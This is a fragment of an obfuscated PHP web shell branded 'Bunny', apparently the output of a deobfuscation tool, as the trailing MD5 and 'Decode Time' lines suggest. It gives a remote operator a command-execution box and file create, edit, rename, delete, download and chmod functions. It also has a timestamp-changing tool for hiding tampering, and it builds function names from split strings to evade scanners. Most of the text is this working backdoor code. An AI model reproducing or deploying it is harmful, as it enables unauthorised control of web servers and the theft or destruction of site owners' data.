                        <p>' . $fi_le_name . '&nbsp;Fi' . 'le Created&nbsp;<i class="fa-solid fa-file-check font-green"></i></p> 
                $f_il_e_failed = ' 
                    <div class="uk-alert-danger" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>Create Fi' . 'le Failed&nbsp;<i class="fa-solid fa-file-xmark font-red"></i></p> 
                if ($fi_le_name == '' && $fi_le_content == '') { 
                    echo ' 
                        <div class="uk-alert-warning" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Sorry. Cant Not Cr' . 'e' . 'a' . 't' . 'e Fi' . 'l' . 'es. Your Input Is Empty&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p> 
                } else { 
                    if ($func_exist($fo)) { 
                        $c_r_e_a_t_e_f_i_l_e_1 = $fo($fi_le_name, 'w'); 
                        if ($c_r_e_a_t_e_f_i_l_e_1 === false) { 
                            $c_r_e_a_t_e_f_i_l_e_2 = $f_put($fi_le_name, $fi_le_content); 
                            if ($c_r_e_a_t_e_f_i_l_e_2 === false) { 
                                echo $f_il_e_failed; 
                            } else { 
                                echo $f_il_e_success; 
                        } else { 
                            if ($fw($c_r_e_a_t_e_f_i_l_e_1, $fi_le_content) === false) { 
                                echo $f_il_e_failed; 
                            } else { 
                                echo $f_il_e_success; 
                    } elseif ($func_exist($f_put)) { 
                        $c_r_e_a_t_e_f_i_l_e_2 = $f_put($fi_le_name, $fi_le_content); 
                        if ($c_r_e_a_t_e_f_i_l_e_2 === false) { 
                            echo $f_il_e_failed; 
                        } else { 
                            echo $f_il_e_success; 
                    } else { 
                        echo ' 
                            <div class="uk-alert-warning" uk-alert> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p>Sorry. Cant Not Cr' . 'ea' . 't' . 'e Fi' . 'le' . 's&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p> 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-new' . 'fi' . 'le' . 's" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Cr' . 'ea' . 'te F' . 'il' . 'e</button> 
                        <legend class="uk-legend font-bold font-protest-riot">N' . 'e' . 'w ' . 'F' . 'il' . 'es</legend> 
                        <div class="uk-margin"> 
                            <input class="uk-input font-poppins" name="newfi' . 'l' . 'es' . 'na' . 'me" type="text" placeholder="fi' . 'le' . 'na' . 'me.' . 't' . 'x' . 't" aria-label="Input"> 
                        <div class="uk-margin"> 
                            <textarea class="uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" placeholder="Bunny Invisible Code Here!" aria-label="Textarea"></textarea> 
        } elseif ($toolsparam === 'newfolder') { 
            if (isset($_POST['btn-newfolder'])) { 
                $f_ol_de_r_name = htmlspecialchars($_POST['newfoldername']); 
                $f_ol_de_r_success = ' 
                    <div class="uk-alert-success" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p><font class="font-yellow">' . $f_ol_de_r_name . '</font>&nbsp;Fo' . 'ld' . 'er Cr' . 'ea' . 'te' . 'd&nbsp;<i class="fa-solid fa-folder-check font-green"></i></p> 
                $f_ol_de_r_failed = ' 
                    <div class="uk-alert-danger" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>Cr' . 'ea' . 't' . 'e F' . 'ol' . 'de' . 'r Failed&nbsp;<i class="fa-solid fa-folder-xmark font-red"></i></p> 
                if ($f_ol_de_r_name == '') { 
                    echo ' 
                        <div class="uk-alert-warning" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Sorry. Cant Not Cr' . 'e' . 'at' . 'e Fo' . 'ld' . 'er. This Input Is Empty&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p> 
                } else { 
                    if (!$is_d($f_ol_de_r_name)) { 
                        if ($cr_ea_teF_old_er($f_ol_de_r_name)) { 
                            echo $f_ol_de_r_success; 
                        } else { 
                            echo $f_ol_de_r_failed; 
                    } else { 
                        echo ' 
                            <div class="uk-alert-warning" uk-alert> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p>Sorry. Cant Not C' . 're' . 'at' . 'e F' . 'ol' . 'de' . 'r. This ' . $fo_lde_rna_me . ' Allready Exists&nbsp;<i class="fa-regular fa-location-exclamation font-yellow"></i></p> 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-newfolder" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Cr' . 'ea' . 'te' . ' F' . 'ol' . 'de' . 'r</button> 
                        <legend class="uk-legend font-bold font-protest-riot">N' . 'e' . 'w ' . 'F' . 'ol' . 'de' . 'r</legend> 
                        <div class="uk-margin"> 
                            <input class="uk-input font-poppins" name="newfoldername" type="text" placeholder="N' . 'e' . 'w F' . 'ol' . 'd' . 'er" aria-label="Input"> 
        } elseif ($toolsparam === 'cmd') { 
            echo ' 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <legend class="uk-legend font-bold font-protest-riot"><i class="fa-solid fa-rectangle-terminal"></i>&nbsp;&nbsp;C' . 'o' . 'mm' . 'an' . 'd</legend> 
                        <div class="uk-margin-small uk-flex uk-flex-row uk-flex-center uk-flex-middle uk-flex-nowrap"> 
                            <label for="komendnya" class="uk-margin-small-right uk-text-large">$</label> 
                            <input style="background: var(--gray-950);" class="uk-input font-poppins uk-margin-small-right" id="komendnya" name="komendnya" type="text" aria-label="Input" autofocus> 
                            <button type="submit" name="btn-cmd" style="background: var(--gray-950); border: 1px solid var(--gray-700);" class="uk-button uk-button-secondary uk-text-bold uk-border-rounded">ENTER</button> 
            if (isset($_POST['btn-cmd'])) { 
                echo '<textarea style="background: var(--gray-950); border: 1px solid var(--gray-500); color: var(--green-500);" class="output-cmd uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" aria-label="Textarea" readonly>' . BunnyCmd($_POST["komendnya"]) . '</textarea>'; 
            echo '</div> 
        } else { 
        if (isset($_GET['editfile'])) { 
            $this_file = $_GET['editfile']; 
            if (isset($_POST['btn-editfiles'])) { 
                $newfilecontent = $_POST['newfilecontent']; 
                $f_il_e_success = ' 
                        <div class="uk-alert-success" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Success, Fi' . 'le Saved&nbsp;<i class="fa-solid fa-file-check font-green"></i></p> 
                $f_il_e_failed = ' 
                    <div class="uk-alert-danger" uk-alert> 
                        <a href class="uk-alert-close" uk-close></a> 
                        <p>Failed, Fi' . 'le Not Saved&nbsp;<i class="fa-solid fa-file-xmark font-red"></i></p> 
                if ($func_exist($fo)) { 
                    $editfi_le1 = $fo($this_file, 'w'); 
                    if ($fw($editfi_le1, $newfilecontent)) { 
                        echo $f_il_e_success; 
                    } else { 
                        echo $f_il_e_failed; 
                } elseif ($func_exist($f_put)) { 
                    $editfi_le2 = $f_put($this_file, $newfilecontent); 
                    if ($editfi_le2 === false) { 
                        echo $f_il_e_failed; 
                    } else { 
                        echo $f_il_e_success; 
                } else { 
                    echo ' 
                        <div class="uk-alert-warning" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Sorry. Cant Edit This Fi' . 'le ' . $this_file . '&nbsp;<i class="fa-solid fa-file-exclamation"></i></p> 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-editfiles" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Save</button> 
                        <legend class="uk-legend font-bold font-protest-riot">Edit Files</legend> 
                        <p class="font-teal">' . $path . '/' . $this_file . '</p> 
                        <div class="uk-margin"> 
                            <textarea style="background: var(--gray-950); color: var(--emerald-500);" class="uk-textarea font-ubuntu-mono" name="newfilecontent" rows="15" aria-label="Textarea">' . $hayoloh(BunnyReadFile($this_file)) . '</textarea> 
        if (isset($_GET['rename'])) { 
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars'; 
            $this_name = $_GET['rename']; 
            $rnm = 'r' . 'e' . 'n' . 'a' . 'm' . 'e'; 
            if (isset($_POST['btn-rename'])) { 
                $newname = $hayoloh($_POST['newname']); 
                if ($rnm($this_name, $path . '/' . $newname)) { 
                    echo ' 
                        <div class="uk-alert-success" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                                <font class="font-green">Rename Success&nbsp;<i class="fa-sharp fa-regular fa-shield-check font-green"></i> 
                                <font class="font-white">' . $this_name . ' To ' . $newname . '</font> 
                } else { 
                    echo ' 
                        <div class="uk-alert-danger" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Rename Failed&nbsp;<i class="fa-regular fa-octagon-xmark font-red"></i></p> 
                $this_name = $newname; 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-rename" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Rename</button> 
                        <p class="font-teal">' . $path . '/' . $this_name . '</p> 
                        <legend class="uk-legend font-bold font-protest-riot">Rename</legend> 
                        <div class="uk-margin"> 
                            <input class="uk-input font-poppins" name="newname" type="text" value="' . $this_name . '" aria-label="Input"> 
        if (isset($_GET['permission'])) { 
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars'; 
            $value = $path . '/' . $_GET['permission']; 
            if (isset($_POST['btn-permission'])) { 
                $newperms = $hayoloh($_POST['newperms']); 
                $chperms = 'c' . 'h' . 'm' . 'o' . 'd'; 
                $oct = 'o' . 'c' . 't' . 'd' . 'e' . 'c'; 
                if ($chperms($value, $oct($newperms))) { 
                    echo ' 
                        <div class="uk-alert-success" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p><font class="font-green">Change Permission Success&nbsp;<i class="fa-sharp fa-regular fa-shield-check font-green"></i></p> 
                } else { 
                    echo ' 
                        <div class="uk-alert-danger" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Change Permission Failed&nbsp;<i class="fa-regular fa-octagon-xmark font-red"></i></p> 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-permission" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Change Permission</button> 
                        <p class="font-teal">' . $value . '</p> 
                        <legend class="uk-legend font-bold font-protest-riot">Cange Permission</legend> 
                        <div class="uk-margin"> 
                            <input class="uk-input font-poppins" name="newperms" type="text" value="' . chPerms($value) . '" aria-label="Input"> 
        if (isset($_GET['changedate'])) { 
            $hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars'; 
            $f_time = 'f' . 'il' . 'e' . 'm' . 't' . 'im' . 'e'; 
            $str_time = 's' . 'tr' . 'to' . 'ti' . 'me'; 
            $tch = 'to' . 'uc' . 'h'; 
            $value = $_GET['changedate']; 
            $this_date = date("Y-m-d H:i:s", $f_time($value)); 
            if (isset($_POST['btn-newdate'])) { 
                $newDate = $hayoloh($_POST['newdate']); 
                if ($str_time($newDate) !== false) { 
                    if ($tch($value, $str_time($newDate))) { 
                        echo ' 
                            <div class="uk-alert-success" uk-alert> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p><font class="font-green">Change Date Success&nbsp;<i class="fa-solid fa-calendar-check"></i></p> 
                    } else { 
                        echo ' 
                            <div class="uk-alert-danger" uk-alert> 
                                <a href class="uk-alert-close" uk-close></a> 
                                <p>Change Date Failed&nbsp;<i class="fa-solid fa-calendar-xmark"></i></p> 
                } else { 
                    echo ' 
                        <div class="uk-alert-warning" uk-alert> 
                            <a href class="uk-alert-close" uk-close></a> 
                            <p>Change Date Failed, Invalid Date Format&nbsp;<i class="fa-solid fa-calendar-exclamation"></i></p> 
            echo ' 
                <div class="uk-divider uk-divider-small"></div> 
                <form action="" method="POST" class="uk-width-1-2"> 
                    <fieldset class="uk-fieldset"> 
                        <div class="uk-margin uk-float-right"> 
                            <button type="submit" name="btn-newdate" class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Change Date</button> 
                        <p class="font-teal">' . $path . '/' . $value . '</p> 
                        <legend class="uk-legend font-bold font-protest-riot">Cange Date</legend> 
                        <div class="uk-margin"> 
                            <input class="uk-input font-poppins" name="newdate" type="text" value="' . $this_date . '" aria-label="Input"> 
    <div class="main uk-width-1-1 uk-margin-top uk-margin-small-left uk-margin-small-right" 
        style="background: var(--gray-900);"> 
        $scn_d = 'sc' . 'an' . 'd' . 'ir'; 
        $scan = $scn_d($path); 
        <div class="uk-overflow-auto uk-flex uk-flex-center uk-flex-middle uk-flex-row uk-flex-wrap"> 
            <form action="" method="POST" enctype="multipart/form-data" class="uk-width-1-1"> 
                <table class="bunny-table uk-width-1-1"> 
                            <th>Select All<br><input type="checkbox" id="checkall" class="checkall" name="checkall" 
                            <th>Last Modified</th> 
                            <td><?= '-' . 'B' . 'I' . 'C' . '-' ?></td> 
                            <td class="body-folder uk-text-nowrap"><a href="?path=<?= dirname($path) ?>" 
                                    class="dirpath font-white"><i 
                                        class="fa-duotone fa-folders font-amber"></i>&nbsp;&nbsp;..</a></td> 
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td> 
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td> 
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td> 
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td> 
                            <td><?= '-' . 'B' . 'U' . 'N' . 'N' . 'Y' . '-' ?></td> 
                        foreach ($scan as $dir) { 
                            if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') 
                            if ($func_exist($psx_usr_uid)) { 
                                $d_owner = @$psx_usr_uid($own_f("$path/$dir")); 
                                $d_owner = $d_owner['name']; 
                            } else { 
                                $d_owner = $own_f("$path/$dir"); 
                            if ($func_exist($psx_grp_gid)) { 
                                $d_group = @$psx_grp_gid($grp_f("$path/$dir")); 
                                $d_group = $d_group['name']; 
                            } else { 
                                $d_group = $grp_f("$path/$dir"); 
                            echo '<tr class="tr-body">'; 
                            echo '<td><input type="checkbox" class="checkfilefolder" name="checkfolder[]" value="' . $dir . '" aria-label="Checkbox"></td>'; 
                            echo '<td class="body-folder uk-text-nowrap"><a href="?path=' . $path . '/' . $dir . '" class="dirpath font-white"><i class="fa-duotone fa-folders font-amber"></i>&nbsp;&nbsp;' . $dir . '</a></td>'; 
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&changedate=' . $dir . '" class="body-datetime">' . date('Y-m-d H:i:s', filemtime($path . '/' . $dir)) . '</a></td>'; 
                            echo '<td class="body-size uk-text-nowrap">--DIR--</td>'; 
                            echo '<td class="uk-text-nowrap">'; 
                            if ($d_owner == 'root' || $d_owner == 0) { 
                                echo '<font class="font-white">' . $d_owner . '</font>'; 
                            } else { 
                                echo '<font class="font-sky">' . $d_owner . '</font>'; 
                            echo '/'; 
                            if ($d_group == 'root' || $d_group == 0) { 
                                echo '<font class="font-white">' . $d_group . '</font>'; 
                            } else { 
                                echo '<font class="font-sky">' . $d_group . '</font>'; 
                            echo '</td>'; 
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&permission=' . $dir . '" class="body-permission">'; 
                            if ($is_w("$path/$dir")) 
                                echo '<font class="font-green green-perms">'; 
                            elseif (!$is_r("$path/$dir")) 
                                echo '<font class="font-red red-perms">'; 
                            echo perms("$path/$dir"); 
                            if ($is_w("$path/$dir") || !$is_r("$path/$dir")) 
                                echo '</font></a></td>'; 
                            echo '<td class="uk-text-nowrap">'; 
                            echo '<a href="?path=' . $path . '&rename=' . $dir . '" uk-tooltip="Rename"><i class="icon fa-sharp fa-solid fa-pen-field rename-folder-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&permission=' . $dir . '" class="uk-margin-small-left uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-duotone fa-user-pen user-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&deletedir=' . $dir . '" uk-tooltip="Permission"><i class="icon fa-solid fa-trash-can-slash delete-icon"></i></a>'; 
                            echo '</td>'; 
                            echo '</tr>'; 
                        foreach ($scan as $file) { 
                            $f_size = 'f' . 'il' . 'es' . 'iz' . 'e'; 
                            if (!$is_f("$path/$file")) 
                            $size = $f_size("$path/$file") / 1024; 
                            $size = $rnd($size, 3); 
                            if ($size >= 1024) { 
                                $size = $rnd($size / 1024, 2) . ' MB'; 
                            } else { 
                                $size = $size . ' KB'; 
                            if ($func_exist($psx_usr_uid)) { 
                                $f_owner = @$psx_usr_uid($own_f("$path/$file")); 
                                $f_owner = $f_owner['name']; 
                            } else { 
                                $f_owner = $own_f("$path/$file"); 
                            if ($func_exist($psx_grp_gid)) { 
                                $f_group = @$psx_grp_gid($grp_f("$path/$file")); 
                                $f_group = $f_group['name']; 
                            } else { 
                                $f_group = $grp_f("$path/$file"); 
                            echo '<tr class="tr-body">'; 
                            echo '<td><input type="checkbox" class="checkfilefolder" name="checkfile[]" value="' . $file . '" aria-label="Checkbox"></td>'; 
                            echo '<td class="body-file uk-text-nowrap"><a href="?path=' . $path . '&editfile=' . $file . '" class="filepath font-white"><i class="fa-solid fa-files font-white"></i>&nbsp;&nbsp;' . $file . '</a></td>'; 
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&changedate=' . $file . '" class="body-datetime">' . date('Y-m-d H:i:s', filemtime($path . '/' . $file)) . '</a></td>'; 
                            echo '<td class="body-size uk-text-nowrap">' . $size . '</td>'; 
                            echo '<td class="uk-text-nowrap">'; 
                            if ($f_owner == 'root' || $f_owner == 0) { 
                                echo '<font class="font-white">' . $f_owner . '</font>'; 
                            } else { 
                                echo '<font class="font-sky">' . $f_owner . '</font>'; 
                            echo '/'; 
                            if ($f_group == 'root' || $f_group == 0) { 
                                echo '<font class="font-white">' . $f_group . '</font>'; 
                            } else { 
                                echo '<font class="font-sky">' . $f_group . '</font>'; 
                            echo '</td>'; 
                            echo '<td class="uk-text-nowrap"><a href="?path=' . $path . '&permission=' . $file . '" class="body-permission">'; 
                            if ($is_w("$path/$file")) 
                                echo '<font class="font-green green-perms">'; 
                            elseif (!$is_r("$path/$file")) 
                                echo '<font class="font-red red-perms">'; 
                            echo perms("$path/$file"); 
                            if ($is_w("$path/$file") || !$is_r("$path/$file")) 
                                echo '</font></a></td>'; 
                            echo '<td class="uk-text-nowrap">'; 
                            echo '<a href="?path=' . $path . '&rename=' . $file . '" uk-tooltip="Rename"><i class="icon fa-sharp fa-solid fa-pen-field rename-file-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&editfile=' . $file . '" class="uk-margin-small-left" uk-tooltip="Rename"><i class="icon fa-regular fa-file-pen edit-file-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&permission=' . $file . '" class="uk-margin-small-left uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-duotone fa-user-pen user-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&downloadfile=' . $file . '" class="uk-margin-small-right" uk-tooltip="Permission"><i class="icon fa-solid fa-folder-arrow-down download-icon"></i></a>'; 
                            echo '<a href="?path=' . $path . '&deletefile=' . $file . '" uk-tooltip="Permission"><i class="icon fa-solid fa-trash-can-slash delete-icon"></i></a>'; 
                            echo '</td>'; 
                            echo '</tr>'; 
                <div class="uk-margin"> 
                        var selectAllCheckbox = document.getElementById('checkall'); 
                        var checkFileFolder = document.querySelectorAll('.checkfilefolder'); 
                        selectAllCheckbox.addEventListener('change', function() { 
                            for (var i = 0; i < checkFileFolder.length; i++) { 
                                checkFileFolder[i].checked = selectAllCheckbox.checked; 
                        for (var i = 0; i < checkFileFolder.length; i++) { 
                            checkFileFolder[i].addEventListener('change', function() { 
                                var allChecked = true; 
                                for (var j = 0; j < checkFileFolder.length; j++) { 
                                    if (!checkFileFolder[j].checked) { 
                                        allChecked = false; 
                                selectAllCheckbox.checked = allChecked; 
                    <select class="mass-option font-white uk-select uk-width-1-6" aria-label="Custom controls" 
                        <option name="mass-delete" value="mass_delete">Delete</option> 
                    <button type="submit" name="btn-mass" class="btn-mass font-white">&gt;&gt;</button> 
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                <font class="font-poppins">&copy;2020 - <?= date("Y"); ?></font> | <a class="font-rose" 
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Function Calls





MD5 ea017783229e0843c3d51ca2d2fab3e0
Eval Count 0
Decode Time 106 ms